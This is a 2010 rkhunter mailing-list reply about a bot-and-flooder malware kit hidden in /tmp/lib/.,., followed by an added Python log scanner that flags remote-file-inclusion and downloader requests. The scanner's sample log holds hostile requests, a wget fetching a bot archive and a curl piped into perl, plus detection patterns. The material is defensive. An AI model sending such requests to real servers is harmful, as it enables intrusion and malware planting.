On Wed, 16 Jun 2010 19:02:38 +0200 Udo Rader <udo.ra...@bestsolution.at> wrote:

> ok, I see you already have met the kit in question ;-)

Seen this malware a couple of times, yes.

> From what I see, there is not much difference between the two
> infections, except maybe that I only see 23 files (instead of the 25)

File count depends on the package and on whether it ran previously, but the contents will mostly be the same: scanner, flooder, bot and maybe a simple process hider.

> and maybe that the kit was installed in /tmp/lib. In there it was
> further hidden inside a ".,." directory, giving /tmp/lib/.,.
>
> Maybe just something to be added to "suspicious directories".

Not necessary, as 'suspscan' will pick it up fine as long as you provide the directory names where processes may write temporary files.

BTW, running 'suspscan' is only a *postmortem* action, and finding the malware is only an *indication* of more serious problems. It would be good to (first make backups, weed out problematic scripts or installations, update software to current and then) harden the web stack and run, say, 'Logwatch' (and extending Logwatch's capabilities to include common downloaders is quite easy: http://www.linuxquestions.org/questions/blog/unspawn-2450/logwatch-webserver-logs-php-malarky-2308/).

HTH,
unSpawn

--
_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
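As an added illustration of the "common downloaders in web logs" idea unSpawn points to above (this is example code written for this page, not unSpawn's Logwatch extension and not part of rkhunter), the script below parses Apache combined-format access log lines and flags requests that carry a remote URL in the query string, a shell downloader command (wget, curl, fetch, lynx), a pipe into an interpreter, or a scripted-fetcher User-Agent. The log lines are constructed for the example (documentation-range IPs, one of them dropping a payload into the same /tmp/lib/.,. path discussed in the thread); the indicator patterns and the function names are this example's own choices, not anything the rkhunter project or Logwatch ships.

```python
"""Flag web-server requests that look like remote-file-inclusion or
shell-downloader activity, the kind of thing one would add to a
Logwatch web-server filter.  Added example for this page; not code
from rkhunter, Logwatch or the original poster."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache/NCSA combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jun/2010:18:55:01 +0200] "GET /index.php?page=http://198.51.100.7/x.txt?? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [16/Jun/2010:18:55:02 +0200] "GET /gallery/?cmd=wget%20http://198.51.100.7/bot.tgz%20-O%20/tmp/lib/.,./b.tgz HTTP/1.1" 200 128 "-" "libwww-perl/5.805"
192.0.2.10 - - [16/Jun/2010:18:56:10 +0200] "GET /about.html HTTP/1.1" 200 2048 "http://example.org/" "Mozilla/5.0"
198.51.100.9 - - [16/Jun/2010:18:57:44 +0200] "POST /upload.php HTTP/1.1" 200 90 "-" "curl/7.19.7"
192.0.2.11 - - [16/Jun/2010:18:58:00 +0200] "GET /cgi-bin/test.cgi?x=|curl%20-s%20http://198.51.100.7/s.pl|perl HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Indicators, matched against the percent-decoded request target.  These
# patterns are an assumption of this example, tune them for your own site.
REMOTE_URL_IN_QUERY = re.compile(r'\?.*\b(?:https?|ftp)://', re.I)   # classic RFI shape
DOWNLOADER_CMD = re.compile(r'\b(?:wget|curl|fetch|lynx)\b', re.I)   # fetch tool in the request
PIPE_TO_INTERPRETER = re.compile(r'\|\s*(?:perl|sh|bash|python)\b', re.I)
# User-Agents of scripted fetchers rather than browsers.
TOOL_UA = re.compile(r'^(?:libwww-perl|curl|wget|python-urllib)', re.I)


def classify(entry):
    """Return the list of indicator names that fire for one parsed log entry."""
    target = unquote(entry['target'])          # decode %20 etc. before matching
    hits = []
    if REMOTE_URL_IN_QUERY.search(target):
        hits.append('remote_url')
    if DOWNLOADER_CMD.search(target):
        hits.append('downloader_cmd')
    if PIPE_TO_INTERPRETER.search(target):
        hits.append('pipe_to_interpreter')
    if TOOL_UA.search(entry['ua']):
        hits.append('tool_user_agent')
    return hits


def scan_log(text):
    """Scan log text; return one finding per suspicious (or unparseable) line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            # A line that does not fit the format is itself worth a look.
            findings.append({'line': lineno, 'ip': None, 'indicators': ['unparsed']})
            continue
        entry = m.groupdict()
        hits = classify(entry)
        if hits:
            findings.append({'line': lineno, 'ip': entry['ip'],
                             'target': unquote(entry['target']),
                             'indicators': hits})
    return findings


def per_client(findings):
    """Logwatch-style summary: number of flagged requests per client address."""
    return Counter(f['ip'] for f in findings if f['ip'])


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']}: {f['ip']} {f.get('target', '')} -> {', '.join(f['indicators'])}")
    print('per client:', dict(per_client(found)))
```

Run it against a real access log by reading the file into scan_log(); the useful part is the per-client summary, since a host that repeatedly hands your PHP a remote URL or a wget/curl string is the one to block and whose requests to trace back to the script that accepted them.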